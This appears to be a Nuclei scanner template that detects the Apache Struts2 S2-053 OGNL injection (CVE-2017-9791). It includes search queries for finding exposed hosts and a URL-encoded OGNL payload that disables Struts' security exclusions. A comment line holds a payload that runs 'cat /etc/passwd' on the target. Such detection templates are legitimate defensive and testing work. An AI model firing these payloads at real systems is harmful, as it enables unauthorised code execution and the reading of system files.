Apache Struts2 S2-053 - Remote Code Execution

id: CVE-2017-9791

info:
  name: Apache Struts2 S2-053 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    Apache Struts 2.1.x and 2.3.x  with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
  impact: |
    Remote code execution
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
  reference:
    - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
    - http://struts.apache.org/docs/s2-048.html
    - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838
    - http://www.securitytracker.com/id/1038838
    - https://security.netapp.com/advisory/ntap-20180706-0002/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-9791
    cwe-id: CWE-20
    epss-score: 0.98931
    epss-percentile: 0.99922
    cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - title:"Struts2 Showcase"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
      - http.html:"apache struts"
    fofa-query:
      - title="Struts2 Showcase"
      - title="struts2 showcase"
      - body="apache struts"
      - body="struts problem report"
    google-query: intitle:"struts2 showcase"
  tags: cve2017,cve,apache,rce,struts,kev,vkev,vuln
variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

# CMD: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)}
http:
  - method: POST
    path:
      - "{{BaseURL}}/integration/saveGangster.action"

    body: |
      name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"
          - "added successfully"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200e8749f21d8c0b6872688f48f239627c0f70035cb8652523b3b1e2f8e8f1f131022100fcacf8cc5f631ca5344c090fdabf09dbad37c4f4235d6da97bb0b2da2583da1d:922c64590222798bb761d5b6d8e72950